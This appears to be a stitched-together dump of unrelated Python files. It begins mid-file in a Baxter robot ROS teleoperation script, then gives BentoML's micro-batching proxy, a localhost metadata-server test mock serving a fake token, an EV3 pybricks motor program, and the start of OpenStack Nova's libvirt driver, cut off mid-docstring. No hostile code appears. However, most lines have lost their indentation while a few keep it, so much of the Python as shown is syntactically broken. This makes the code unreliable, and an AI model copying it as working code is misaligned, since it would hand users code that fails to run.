                self._gripper_left.close()
            elif self._gripper_left_status < .5 and pose[0] > .5:
                self._gripper_left.open()
            self._gripper_left_status = pose[0]
if limb == 'right':
self._right_ik_solver.solve(pose[1:4], pose[4:8])
            if self._gripper_right_status > .5 and pose[0] < .5:
                self._gripper_right.close()
            elif self._gripper_right_status < .5 and pose[0] > .5:
                self._gripper_right.open()
            self._gripper_right_status = pose[0]
self._executed = False
self._execution_start = rospy.get_time()
def pose_to_pos_and_ori(self, pose):
pos = numpy.array([pose.position.x, pose.position.y, pose.position.z])
al, be, ga = euler_from_quaternion(numpy.array([pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w]))
ori = numpy.array([al, be, ga])
return (pos, ori)
def pos_and_ori_to_pose(self, pos, ori):
pose = Pose()
pose.position.x = pos[0]; pose.position.y = pos[1]; pose.position.z = pos[2]
pose.orientation.x = ori[0]; pose.orientation.y = ori[1]; pose.orientation.z = ori[2]; pose.orientation.w = ori[3]
return pose
def right_end_callback(self, state):
self._current_right_pose = state.pose
if(self._initial_right_pose.position.x == 0):
self._initial_right_pose = state.pose
def left_end_callback(self, state):
self._current_left_pose = state.pose
if(self._initial_left_pose.position.x == 0):
self._initial_left_pose = state.pose
def objects_pose_callback(self, state):
if len(state.markers) > 0:
self._objects_pose = [None] * len(state.markers)
for i in range(len(state.markers)):
self._objects_pose[i] = state.markers[i].pose.pose
def pose_to_array(self, pose):
return np.array([pose.position.x, pose.position.y, pose.position.z, pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w])
def transform_unity_to_baxter(self, unity_pose):
        # transform end-effector position
# unity: x = backward, y = up, z = right
# baxter: x = forward, y = left, z = up
baxter_pose = copy.copy(unity_pose)
unity_pose[0:3] /= 1.8
baxter_pose[0] = -unity_pose[0] + 1.3
baxter_pose[1] = -unity_pose[2] - .15
baxter_pose[2] = unity_pose[1] - .98
        # transform end-effector orientation, it is calculated using trial and error, so don't expect an understandable code here
baxter_pose[3] = unity_pose[6]
baxter_pose[4] = unity_pose[3]
baxter_pose[5] = unity_pose[4]
baxter_pose[6] = unity_pose[5]
ori_matrix = quaternion_matrix(baxter_pose[3:7])
angle, axis, point = rotation_from_matrix(ori_matrix)
axis[2] = -axis[2]
ori_matrix = rotation_matrix(-angle, axis)
rot_matrix = euler_matrix(1.57,0,0)
rot_matrix = euler_matrix(0,0,3.14).dot(rot_matrix)
rot_matrix = rot_matrix.dot(ori_matrix)
angle, axis, point = rotation_from_matrix(rot_matrix)
axis_0 = axis[0]
axis[0] = -axis[1]
axis[1] = axis_0
rot_matrix = rotation_matrix(angle, axis)
ori_quat = quaternion_from_matrix(rot_matrix)
baxter_pose[3] = ori_quat[1]
baxter_pose[4] = ori_quat[2]
baxter_pose[5] = ori_quat[3]
baxter_pose[6] = ori_quat[0]
return baxter_pose
def transform_baxter_to_unity(self, baxter_pose):
# unity: x = backward, y = up, z = right
# baxter: x = forward, y = left, z = up
unity_pose = copy.copy(baxter_pose)
unity_pose[0] = -baxter_pose[0] + 1.3
unity_pose[1] = baxter_pose[2] + .98
unity_pose[2] = -baxter_pose[1] - .15
unity_pose[0:3] *= 1.8
# transform end-effector orientation, it is calculated using trial and error, so, don't expect an understandable code here
unity_pose[3] = baxter_pose[4]
unity_pose[4] = baxter_pose[5]
unity_pose[5] = baxter_pose[6]
unity_pose[6] = baxter_pose[3]
ori_matrix = quaternion_matrix(unity_pose[3:7])
angle, axis, point = rotation_from_matrix(ori_matrix)
axis_0 = axis[0]
axis[0] = axis[1]
axis[1] = -axis_0
ori_matrix = rotation_matrix(angle, axis)
rot_matrix = euler_matrix(0,0,-3.14)
rot_matrix = euler_matrix(-1.57,0,0).dot(rot_matrix)
rot_matrix = ori_matrix.dot(rot_matrix)
angle, axis, point = rotation_from_matrix(rot_matrix)
axis[2] = -axis[2]
rot_matrix = rotation_matrix(-angle, axis)
ori_quat = quaternion_from_matrix(rot_matrix)
unity_pose[3] = ori_quat[1]
unity_pose[4] = ori_quat[2]
unity_pose[5] = ori_quat[3]
unity_pose[6] = ori_quat[0]
return unity_pose
def transform_kinect_to_unity(self, kinect_pose):
# unity: x = backward, y = up, z = right
# kinect: x = forward, y = left, z = up
unity_pose = copy.copy(kinect_pose)
unity_pose[0] = -kinect_pose[0] + 1.5
unity_pose[1] = kinect_pose[2] + .60
unity_pose[2] = -kinect_pose[1] + .05
unity_pose[0:3] *= 1.8
# transform end-effector orientation, it is calculated using trial and error, so, don't expect an understandable code here
unity_pose[3] = kinect_pose[4]
unity_pose[4] = kinect_pose[5]
unity_pose[5] = kinect_pose[6]
unity_pose[6] = kinect_pose[3]
ori_matrix = quaternion_matrix(unity_pose[3:7])
angle, axis, point = rotation_from_matrix(ori_matrix)
axis_0 = axis[0]
axis[0] = axis[1]
axis[1] = -axis_0
ori_matrix = rotation_matrix(angle, axis)
rot_matrix = euler_matrix(3.14,0,-3.14)
rot_matrix = euler_matrix(-1.57,0,0).dot(rot_matrix)
rot_matrix = ori_matrix.dot(rot_matrix)
angle, axis, point = rotation_from_matrix(rot_matrix)
axis_1 = axis[1]
axis[1] = axis[2]
axis[2] = axis_1
rot_matrix = rotation_matrix(-angle, axis)
ori_quat = quaternion_from_matrix(rot_matrix)
unity_pose[3] = ori_quat[1]
unity_pose[4] = ori_quat[2]
unity_pose[5] = ori_quat[3]
unity_pose[6] = ori_quat[0]
return unity_pose
def write_env_state(self, limb):
if hasattr(self, '_objects_pose'):
with open(self._filename, 'w') as f:
f.write('time,gripper,gripper_center_p_x,gripper_center_p_y,gripper_center_p_z,gripper_center_r_x,gripper_center_r_y,gripper_center_r_z,gripper_center_r_w,')
f.write('box (1)_p_x,box (1)_p_y,box (1)_p_z,box (1)_r_x,box (1)_r_y,box (1)_r_z,box (1)_r_w,')
f.write('task')
f.write('\n' + str(rospy.get_time()) + ',' + str(self._gripper_left_status if limb == 'left' else self._gripper_right_status) + ',')
if limb == 'left':
limb_pose_left = self.transform_baxter_to_unity(self.pose_to_array(self._current_left_pose))
f.write(','.join([str(x) for x in limb_pose_left]) + ',')
elif limb == 'right':
limb_pose_right = self.transform_baxter_to_unity(self.pose_to_array(self._current_right_pose))
f.write(','.join([str(x) for x in limb_pose_right]) + ',')
object_pose = self.transform_kinect_to_unity(self.pose_to_array(self._objects_pose[0]))
# print object_pose
# print np.array([1.439304,0.9475655,0.4852195, 0, 0, 0, 1])
f.write(','.join([str(x) for x in object_pose]) + ',')
# f.write('1.066,1,0.450393,0,0,0,1,')
f.write('18,')
else:
print 'No information about position of the objects.'
def difference_of_joints(self):
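        # Moves the commanded joint angles a bounded step towards the current IK
        # solution (scaled by the joint-space distance) and flags the motion as
        # executed once both arms are close enough or the execution timeout passes.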
self._right_ik_solver.solution_to_execute = self._right_ik_solver.solution
self._left_ik_solver.solution_to_execute = self._left_ik_solver.solution
right_diff = 0; left_diff = 0
if self._right_ik_solver.foundSolution:
angles_right_nums = numpy.array([self._limb_right.joint_angle(j) for j in self._right_names])
solution_right = numpy.array(self._right_ik_solver.solution)
right_diff = numpy.linalg.norm(solution_right - angles_right_nums)*10.0
if right_diff < 10:
self._right_ik_solver.solution_to_execute = (angles_right_nums + (solution_right - angles_right_nums)/10.0).tolist()
else:
self._right_ik_solver.solution_to_execute = (angles_right_nums + (solution_right - angles_right_nums)/right_diff).tolist()
if self._left_ik_solver.foundSolution:
angles_left_nums = numpy.array([self._limb_left.joint_angle(j) for j in self._left_names])
solution_left = numpy.array(self._left_ik_solver.solution)
# print angles_left_nums, solution_left
left_diff = numpy.linalg.norm(solution_left - angles_left_nums)*10.0
if left_diff < 10:
self._left_ik_solver.solution_to_execute = (angles_left_nums + (solution_left - angles_left_nums)/10.0).tolist()
else:
self._left_ik_solver.solution_to_execute = (angles_left_nums + (solution_left - angles_left_nums)/left_diff).tolist()
# print right_diff, left_diff
if ( right_diff < 10 and left_diff < 10 ) or rospy.get_time() - self._execution_start > self._execution_timeout:
# print right_diff, left_diff
self._executed = True
# self.write_env_state()
def _update_thread(self):
rospy.loginfo("Starting Joint Update Thread:")
print 'Baxter execution thread started. '
while not rospy.is_shutdown() and not self._end_thread:
self.difference_of_joints()
if self._right_ik_solver.foundSolution:
right_angles = dict(zip(self._right_names[0:], self._right_ik_solver.solution_to_execute[0:]))
self._limb_right.set_joint_positions(right_angles)
if self._left_ik_solver.foundSolution:
left_angles = dict(zip(self._left_names[0:], self._left_ik_solver.solution_to_execute[0:]))
self._limb_left.set_joint_positions(left_angles)
# if self._right_ik_solver.foundSolution == False and self._left_ik_solver.foundSolution == False:
# print self._right_ik_solver.foundSolution, self._left_ik_solver.foundSolution
# if not self._right_ik_solver.foundSolution or not self._left_ik_solver.foundSolution:
# self._executed = True
self._rate.sleep()
rospy.loginfo("Stopped")
def main():
epilog = """
Related examples:
joint_position_file_playback.py; joint_trajectory_file_playback.py.
"""
arg_fmt = argparse.RawDescriptionHelpFormatter
parser = argparse.ArgumentParser(formatter_class=arg_fmt,
description=main.__doc__,
epilog=epilog)
parser.add_argument(
'-l', '--limb', default='right',
help='limb to move.'
)
parser.add_argument(
'-f', '--file', default='nofile', dest='filename',
help='the file name to read from'
)
args = parser.parse_args(rospy.myargv()[1:])
    global poseToJoints
    poseToJoints = PoseToJoints(args.filename, args.limb)
rospy.spin()
if __name__ == '__main__':
main()
|
marshal.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import functools
import logging
import multiprocessing
import time
import traceback
import aiohttp
import psutil
from dependency_injector.wiring import inject, Provide
from bentoml.configuration.containers import BentoMLContainer
from bentoml.exceptions import RemoteException
from bentoml.marshal.dispatcher import CorkDispatcher, NonBlockSema
from bentoml.marshal.utils import DataLoader
from bentoml.saved_bundle import load_bento_service_metadata
from bentoml.tracing.trace import async_trace, make_http_headers
from bentoml.types import HTTPRequest, HTTPResponse
logger = logging.getLogger(__name__)
def metrics_patch(cls):
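    """Class decorator that wraps the given marshal service class so request
    totals, durations, in-progress counts, batch sizes and exceptions are
    exported as Prometheus metrics."""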
class _MarshalService(cls):
@inject
def __init__(
self,
*args,
namespace: str = Provide[BentoMLContainer.config.instrument.namespace],
**kwargs,
):
for attr_name in functools.WRAPPER_ASSIGNMENTS:
try:
setattr(self.__class__, attr_name, getattr(cls, attr_name))
except AttributeError:
pass
from prometheus_client import Counter, Gauge, Histogram
super(_MarshalService, self).__init__(*args, **kwargs)
# its own namespace?
service_name = self.bento_service_metadata_pb.name
self.metrics_request_batch_size = Histogram(
name=service_name + '_mb_batch_size',
documentation=service_name + "microbatch request batch size",
namespace=namespace,
labelnames=['endpoint'],
)
self.metrics_request_duration = Histogram(
name=service_name + '_mb_requestmb_duration_seconds',
documentation=service_name + "API HTTP request duration in seconds",
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
self.metrics_request_in_progress = Gauge(
name=service_name + "_mb_request_in_progress",
documentation='Total number of HTTP requests in progress now',
namespace=namespace,
labelnames=['endpoint', 'http_method'],
)
self.metrics_request_exception = Counter(
name=service_name + "_mb_request_exception",
documentation='Total number of service exceptions',
namespace=namespace,
labelnames=['endpoint', 'exception_class'],
)
self.metrics_request_total = Counter(
name=service_name + "_mb_request_total",
                documentation='Total number of HTTP requests',
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
async def request_dispatcher(self, request):
func = super(_MarshalService, self).request_dispatcher
api_name = request.match_info.get("name", "/")
_metrics_request_in_progress = self.metrics_request_in_progress.labels(
endpoint=api_name, http_method=request.method,
)
_metrics_request_in_progress.inc()
time_st = time.time()
try:
resp = await func(request)
except asyncio.CancelledError:
resp = aiohttp.web.Response(status=503)
except Exception as e: # pylint: disable=broad-except
self.metrics_request_exception.labels(
endpoint=api_name, exception_class=e.__class__.__name__
).inc()
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(status=500)
self.metrics_request_total.labels(
endpoint=api_name, http_response_code=resp.status
).inc()
self.metrics_request_duration.labels(
endpoint=api_name, http_response_code=resp.status
).observe(time.time() - time_st)
_metrics_request_in_progress.dec()
return resp
async def _batch_handler_template(self, requests, api_name):
func = super(_MarshalService, self)._batch_handler_template
self.metrics_request_batch_size.labels(endpoint=api_name).observe(
len(requests)
)
return await func(requests, api_name)
return _MarshalService
@metrics_patch
class MarshalService:
"""
MarshalService creates a reverse proxy server in front of actual API server,
implementing the micro batching feature.
    It waits for a short period and packs multiple requests into a single batch
    before sending them to the API server.
    It applies an optimized CORK algorithm to get the best efficiency.
"""
@inject
def __init__(
self,
bento_bundle_path,
outbound_host="localhost",
outbound_port=None,
outbound_workers=1,
mb_max_batch_size: int = None,
mb_max_latency: int = None,
request_header_flag: str = Provide[
BentoMLContainer.config.marshal_server.request_header_flag
],
max_request_size: int = Provide[
BentoMLContainer.config.api_server.max_request_size
],
zipkin_api_url: str = Provide[BentoMLContainer.config.tracing.zipkin_api_url],
):
self.outbound_host = outbound_host
self.outbound_port = outbound_port
self.outbound_workers = outbound_workers
self.mb_max_batch_size = mb_max_batch_size
self.mb_max_latency = mb_max_latency
self.batch_handlers = dict()
self._outbound_sema = None # the semaphore to limit outbound connections
self.request_header_flag = request_header_flag
self.max_request_size = max_request_size
self.zipkin_api_url = zipkin_api_url
self.bento_service_metadata_pb = load_bento_service_metadata(bento_bundle_path)
self.setup_routes_from_pb(self.bento_service_metadata_pb)
if psutil.POSIX:
import resource
self.CONNECTION_LIMIT = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
self.CONNECTION_LIMIT = 1024
logger.info(
"Your system nofile limit is %d, which means each instance of microbatch "
"service is able to hold this number of connections at same time. "
"You can increase the number of file descriptors for the server process, "
"or launch more microbatch instances to accept more concurrent connection.",
self.CONNECTION_LIMIT,
)
def set_outbound_port(self, outbound_port):
self.outbound_port = outbound_port
def fetch_sema(self):
if self._outbound_sema is None:
self._outbound_sema = NonBlockSema(self.outbound_workers)
return self._outbound_sema
def add_batch_handler(self, api_name, max_latency, max_batch_size):
'''
Params:
* max_latency: limit the max latency of overall request handling
* max_batch_size: limit the max batch size for handler
** marshal server will give priority to meet these limits than efficiency
'''
if api_name not in self.batch_handlers:
_func = CorkDispatcher(
max_latency,
max_batch_size,
shared_sema=self.fetch_sema(),
fallback=aiohttp.web.HTTPTooManyRequests,
)(functools.partial(self._batch_handler_template, api_name=api_name))
self.batch_handlers[api_name] = _func
def setup_routes_from_pb(self, bento_service_metadata_pb):
for api_pb in bento_service_metadata_pb.apis:
if api_pb.batch:
max_latency = api_pb.mb_max_latency or self.mb_max_latency
max_batch_size = api_pb.mb_max_batch_size or self.mb_max_batch_size
self.add_batch_handler(api_pb.name, max_latency, max_batch_size)
logger.info(
"Micro batch enabled for API `%s` max-latency: %s"
" max-batch-size %s",
api_pb.name,
max_latency,
max_batch_size,
)
async def request_dispatcher(self, request):
with async_trace(
self.zipkin_api_url,
service_name=self.__class__.__name__,
span_name="[1]http request",
is_root=True,
standalone=True,
sample_rate=0.001,
):
api_name = request.match_info.get("name")
if api_name in self.batch_handlers:
req = HTTPRequest(
tuple((k.decode(), v.decode()) for k, v in request.raw_headers),
await request.read(),
)
try:
resp = await self.batch_handlers[api_name](req)
except RemoteException as e:
# known remote exception
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(
status=e.payload.status,
headers=e.payload.headers,
body=e.payload.body,
)
except Exception: # pylint: disable=broad-except
logger.error(traceback.format_exc())
resp = aiohttp.web.HTTPInternalServerError()
else:
resp = await self.relay_handler(request)
return resp
async def relay_handler(self, request):
data = await request.read()
headers = dict(request.headers)
url = request.url.with_host(self.outbound_host).with_port(self.outbound_port)
with async_trace(
self.zipkin_api_url,
service_name=self.__class__.__name__,
span_name=f"[2]{url.path} relay",
) as trace_ctx:
headers.update(make_http_headers(trace_ctx))
async with aiohttp.ClientSession(auto_decompress=False) as client:
async with client.request(
                    request.method, url, data=data, headers=headers
) as resp:
body = await resp.read()
return aiohttp.web.Response(
status=resp.status, body=body, headers=resp.headers,
)
async def _batch_handler_template(self, requests, api_name):
'''
batch request handler
params:
* requests: list of aiohttp request
* api_name: called API name
raise:
* RemoteException: known exceptions from model server
* Exception: other exceptions
'''
headers = {self.request_header_flag: "true"}
api_url = f"http://{self.outbound_host}:{self.outbound_port}/{api_name}"
with async_trace(
self.zipkin_api_url,
service_name=self.__class__.__name__,
span_name=f"[2]merged {api_name}",
) as trace_ctx:
headers.update(make_http_headers(trace_ctx))
reqs_s = DataLoader.merge_requests(requests)
try:
async with aiohttp.ClientSession(auto_decompress=False) as client:
async with client.post(
api_url, data=reqs_s, headers=headers
) as resp:
raw = await resp.read()
except aiohttp.client_exceptions.ClientConnectionError as e:
raise RemoteException(
e, payload=HTTPResponse(status=503, body=b"Service Unavailable")
)
if resp.status != 200:
raise RemoteException(
f"Bad response status from model server:\n{resp.status}\n{raw}",
payload=HTTPResponse(
status=resp.status,
headers=tuple(resp.headers.items()),
body=raw,
),
)
merged = DataLoader.split_responses(raw)
return tuple(
aiohttp.web.Response(
body=i.body, headers=i.headers, status=i.status or 500
)
for i in merged
)
def async_start(self, port):
"""
        Start a micro batch server at the given port.
"""
marshal_proc = multiprocessing.Process(
target=self.fork_start_app, kwargs=dict(port=port), daemon=True,
)
marshal_proc.start()
logger.info("Running micro batch service on :%d", port)
def make_app(self):
app = aiohttp.web.Application(client_max_size=self.max_request_size)
app.router.add_view("/", self.relay_handler)
app.router.add_view("/{name}", self.request_dispatcher)
app.router.add_view("/{path:.*}", self.relay_handler)
return app
def fork_start_app(self, port):
# Use new eventloop in the fork process to avoid problems on MacOS
# ref: https://groups.google.com/forum/#!topic/python-tornado/DkXjSNPCzsI
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
app = self.make_app()
aiohttp.web.run_app(app, port=port)
|
metadata_server_mock.py
|
import json
import threading
from http.server import ThreadingHTTPServer, BaseHTTPRequestHandler
_MDS_ADDRESS = ("localhost", 50052)
def metadata_server(token):
class MetadataHandler(BaseHTTPRequestHandler):
def do_GET(self):
            data = json.dumps({
"access_token": token,
"expires_in": 100,
"token_type": "Bearer"
}).encode("utf-8")
self.send_response(200)
self.send_header('Content-Length', len(data))
self.end_headers()
self.wfile.write(data)
srv = ThreadingHTTPServer(_MDS_ADDRESS, MetadataHandler)
thread = threading.Thread(target=srv.serve_forever)
thread.daemon = True
thread.start()
srv.addr = "{}:{}".format(_MDS_ADDRESS[0], _MDS_ADDRESS[1])
return srv
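# Illustrative usage: start the mock, point a metadata client at srv.addr,
# then shut it down when done.
#   srv = metadata_server("fake-token")
#   ...
#   srv.shutdown()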
|
main.py
|
#!/usr/bin/env pybricks-micropython
import struct, threading
from pybricks import ev3brick as brick
from pybricks.ev3devices import (Motor, TouchSensor, ColorSensor, InfraredSensor, UltrasonicSensor, GyroSensor)
from pybricks.parameters import (Port, Stop, Direction, Button, Color, SoundFile, ImageFile, Align)
from pybricks.tools import print, wait, StopWatch
from pybricks.robotics import DriveBase
from devices import detectJoystick
class Robot():
def __init__(self):
self.motor = Motor(Port.B)
self.ultrasonic = UltrasonicSensor(Port.S4)
self.active = True
self.speed = 0
self.colors = [None, Color.GREEN, Color.YELLOW, Color.RED]
def setSpeed(self, acc):
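        # acc > 0 steps the speed up, acc < 0 steps it down, acc == 0 stops;
        # speed is clamped to [-3, 3], mapped to a motor command, and the
        # brick light colour reflects its magnitude.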
if acc < 0:
self.speed = max(-3, self.speed - 1)
elif acc > 0:
self.speed = min(3, self.speed + 1)
else:
self.speed = 0
if self.speed != 0:
self.motor.run(self.speed * 90)
else:
self.motor.stop()
brick.light(self.colors[abs(self.speed)])
def inactive(self):
self.active = False
self.setSpeed(0)
brick.sound.beep()
def autoStopLoop(robot):
while robot.active:
if robot.speed > 0 and robot.ultrasonic.distance() < 200:
robot.setSpeed(0)
wait(100)
def joystickLoop(robot, eventFile):
FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)
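    # 'llHHI' mirrors the Linux input_event layout: two longs for the
    # timestamp (seconds, microseconds) followed by event type, code and value.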
with open(eventFile, 'rb') as infile:
while True:
event = infile.read(EVENT_SIZE)
_, _, t, c, v = struct.unpack(FORMAT, event)
# button A, B:
if t == 1 and v == 1:
if c == 305:
# press A:
robot.setSpeed(1)
elif c == 304:
# press B:
robot.setSpeed(-1)
elif c == 307:
# press X:
return robot.inactive()
elif t == 3:
if c == 1:
# Left stick & vertical:
speed = 0
if v < 32768:
# up:
speed = 1
elif v > 32768:
# down:
speed = -1
robot.setSpeed(speed)
def buttonLoop(robot):
while True:
if not any(brick.buttons()):
wait(10)
else:
if Button.LEFT in brick.buttons():
robot.setSpeed(-1)
elif Button.RIGHT in brick.buttons():
robot.setSpeed(1)
elif Button.CENTER in brick.buttons():
robot.setSpeed(0)
elif Button.UP in brick.buttons():
return robot.inactive()
wait(500)
def main():
brick.sound.beep()
joystickEvent = detectJoystick(['Controller'])
robot = Robot()
t = threading.Thread(target=autoStopLoop, args=(robot,))
t.start()
if joystickEvent:
joystickLoop(robot, joystickEvent)
else:
buttonLoop(robot)
main()
|
driver.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to a hypervisor through libvirt.
Supports KVM, LXC, QEMU, UML, and XEN.
"""
import errno
import functools
import glob
import mmap
import os
import shutil
import socket
import sys
import tempfile
import threading
import time
import uuid
import eventlet
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from eventlet import util as eventlet_util
from lxml import etree
from oslo.config import cfg
import six
from nova.api.metadata import base as instance_metadata
from nova import block_device
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_mode
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import image
from nova import objects
from nova.openstack.common import excutils
from nova.openstack.common import fileutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import loopingcall
from nova.openstack.common import processutils
from nova.openstack.common import timeutils
from nova.openstack.common import units
from nova.openstack.common import xmlutils
from nova.pci import pci_manager
from nova.pci import pci_utils
from nova.pci import pci_whitelist
from nova import rpc
from nova import utils
from nova import version
from nova.virt import block_device as driver_block_device
from nova.virt import configdrive
from nova.virt import diagnostics
from nova.virt.disk import api as disk
from nova.virt.disk.vfs import guestfs
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import firewall
from nova.virt import hardware
from nova.virt.libvirt import blockinfo
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import firewall as libvirt_firewall
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import imagecache
from nova.virt.libvirt import lvm
from nova.virt.libvirt import rbd_utils
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt.libvirt import vif as libvirt_vif
from nova.virt import netutils
from nova.virt import watchdog_actions
from nova import volume
from nova.volume import encryptors
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue")
libvirt = None
LOG = logging.getLogger(__name__)
libvirt_opts = [
cfg.StrOpt('rescue_image_id',
help='Rescue ami image. This will not be used if an image id '
'is provided by the user.'),
cfg.StrOpt('rescue_kernel_id',
help='Rescue aki image'),
cfg.StrOpt('rescue_ramdisk_id',
help='Rescue ari image'),
cfg.StrOpt('virt_type',
default='kvm',
help='Libvirt domain type (valid options are: '
'kvm, lxc, qemu, uml, xen)'),
cfg.StrOpt('connection_uri',
default='',
help='Override the default libvirt URI '
'(which is dependent on virt_type)'),
cfg.BoolOpt('inject_password',
default=False,
help='Inject the admin password at boot time, '
'without an agent.'),
cfg.BoolOpt('inject_key',
default=False,
help='Inject the ssh public key at boot time'),
cfg.IntOpt('inject_partition',
default=-2,
help='The partition to inject to : '
'-2 => disable, -1 => inspect (libguestfs only), '
'0 => not partitioned, >0 => partition number'),
cfg.BoolOpt('use_usb_tablet',
default=True,
help='Sync virtual and real mouse cursors in Windows VMs'),
cfg.StrOpt('live_migration_uri',
default="qemu+tcp://%s/system",
help='Migration target URI '
'(any included "%s" is replaced with '
'the migration target hostname)'),
cfg.StrOpt('live_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER, '
'VIR_MIGRATE_LIVE, VIR_MIGRATE_TUNNELLED',
help='Migration flags to be set for live migration'),
cfg.StrOpt('block_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER, '
'VIR_MIGRATE_LIVE, VIR_MIGRATE_TUNNELLED, '
'VIR_MIGRATE_NON_SHARED_INC',
help='Migration flags to be set for block migration'),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help='Maximum bandwidth to be used during migration, in Mbps'),
cfg.StrOpt('snapshot_image_format',
help='Snapshot image format (valid options are : '
'raw, qcow2, vmdk, vdi). '
'Defaults to same as source image'),
cfg.ListOpt('volume_drivers',
default=[
'iscsi=nova.virt.libvirt.volume.LibvirtISCSIVolumeDriver',
'iser=nova.virt.libvirt.volume.LibvirtISERVolumeDriver',
'local=nova.virt.libvirt.volume.LibvirtVolumeDriver',
'fake=nova.virt.libvirt.volume.LibvirtFakeVolumeDriver',
'rbd=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'sheepdog=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'nfs=nova.virt.libvirt.volume.LibvirtNFSVolumeDriver',
'aoe=nova.virt.libvirt.volume.LibvirtAOEVolumeDriver',
'glusterfs='
'nova.virt.libvirt.volume.LibvirtGlusterfsVolumeDriver',
'fibre_channel=nova.virt.libvirt.volume.'
'LibvirtFibreChannelVolumeDriver',
'scality='
'nova.virt.libvirt.volume.LibvirtScalityVolumeDriver',
],
help='Libvirt handlers for remote volumes.'),
cfg.StrOpt('disk_prefix',
help='Override the default disk prefix for the devices attached'
' to a server, which is dependent on virt_type. '
'(valid options are: sd, xvd, uvd, vd)'),
cfg.IntOpt('wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
' if instance does not shutdown within this window.'),
cfg.StrOpt('cpu_mode',
help='Set to "host-model" to clone the host CPU feature flags; '
'to "host-passthrough" to use the host CPU model exactly; '
'to "custom" to use a named CPU model; '
'to "none" to not set any CPU model. '
'If virt_type="kvm|qemu", it will default to '
'"host-model", otherwise it will default to "none"'),
cfg.StrOpt('cpu_model',
help='Set to a named libvirt CPU model (see names listed '
'in /usr/share/libvirt/cpu_map.xml). Only has effect if '
'cpu_mode="custom" and virt_type="kvm|qemu"'),
cfg.StrOpt('snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g: file=directsync,block=none'),
cfg.StrOpt('rng_dev_path',
help='A path to a device that will be used as source of '
'entropy on the host. Permitted options are: '
'/dev/random or /dev/hwrng'),
cfg.ListOpt('hw_machine_type',
help='For qemu or KVM guests, set this option to specify '
'a default machine type per host architecture. '
'You can find a list of supported machine types '
'in your environment by checking the output of '
'the "virsh capabilities"command. The format of the '
'value for this config option is host-arch=machine-type. '
'For example: x86_64=machinetype1,armv7l=machinetype2'),
cfg.StrOpt('sysinfo_serial',
default='auto',
               help='The data source used to populate the host "serial" '
'UUID exposed to guest in the virtual BIOS. Permitted '
'options are "hardware", "os", "none" or "auto" '
'(default).'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_opts, 'libvirt')
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
CONF.import_opt('use_cow_images', 'nova.virt.driver')
CONF.import_opt('live_migration_retry_count', 'nova.compute.manager')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
CONF.import_opt('server_proxyclient_address', 'nova.spice', group='spice')
CONF.import_opt('vcpu_pin_set', 'nova.virt.hardware')
CONF.import_opt('vif_plugging_is_fatal', 'nova.virt.driver')
CONF.import_opt('vif_plugging_timeout', 'nova.virt.driver')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
libvirt_firewall.__name__,
libvirt_firewall.IptablesFirewallDriver.__name__)
MAX_CONSOLE_BYTES = 100 * units.Ki
# The libvirt driver will prefix any disable reason codes with this string.
DISABLE_PREFIX = 'AUTO: '
# Disable reason for the service which was enabled or disabled without reason
DISABLE_REASON_UNDEFINED = 'None'
def patch_tpool_proxy():
"""eventlet.tpool.Proxy doesn't work with old-style class in __str__()
or __repr__() calls. See bug #962840 for details.
